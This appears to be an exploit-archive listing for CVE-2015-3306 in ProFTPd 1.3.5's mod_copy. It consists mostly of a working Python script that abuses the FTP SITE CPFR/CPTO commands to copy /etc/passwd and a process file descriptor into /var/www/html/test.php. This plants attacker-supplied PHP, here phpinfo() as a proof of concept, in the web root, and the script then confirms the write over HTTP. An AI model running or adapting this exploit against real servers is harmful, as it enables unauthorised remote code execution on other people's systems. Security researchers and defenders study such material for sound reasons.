ProFTPd 1.3.5 Remote Command Execution

ProFTPd version 1.3.5 remote command execution exploit. This is a variant of the original vulnerability discovered in 2015 with credit going to R-73eN.


MD5 | 65284b1eff912220e6161a800f3801c5

# Exploit Title: ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)
# Date: 25/05/2021
# Exploit Author: Shellbr3ak
# Version: 1.3.5
# Tested on: Ubuntu 16.04.6 LTS
# CVE : CVE-2015-3306

#!/usr/bin/env python3

import sys
import socket
import requests

def exploit(client, target):
client.connect((target,21)) # Connecting to the target server
banner = client.recv(74)
print(banner.decode())
client.send(b'site cpfr /etc/passwd\r\n')
print(client.recv(1024).decode())
client.send(b'site cpto <?php phpinfo(); ?>\r\n') # phpinfo() is just a PoC.
print(client.recv(1024).decode())
client.send(b'site cpfr /proc/self/fd/3\r\n')
print(client.recv(1024).decode())
client.send(b'site cpto /var/www/html/test.php\r\n')
print(client.recv(1024).decode())
client.close()
print('Exploit Completed')

def check(url):
req = requests.get(url) # Requesting the written PoC php file via HTTP
if req.status_code == 200:
print('[+] File Written Successfully')
print(f'[+] Go to : {url}')
else:
print('[!] Something Went Wrong')
print('[!] Directory might not be writable')

def main():
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
target = sys.argv[1]
exploit(client, target)
url = 'http://' + target + '/test.php'
check(url)

if __name__ == '__main__':
main()


Related Posts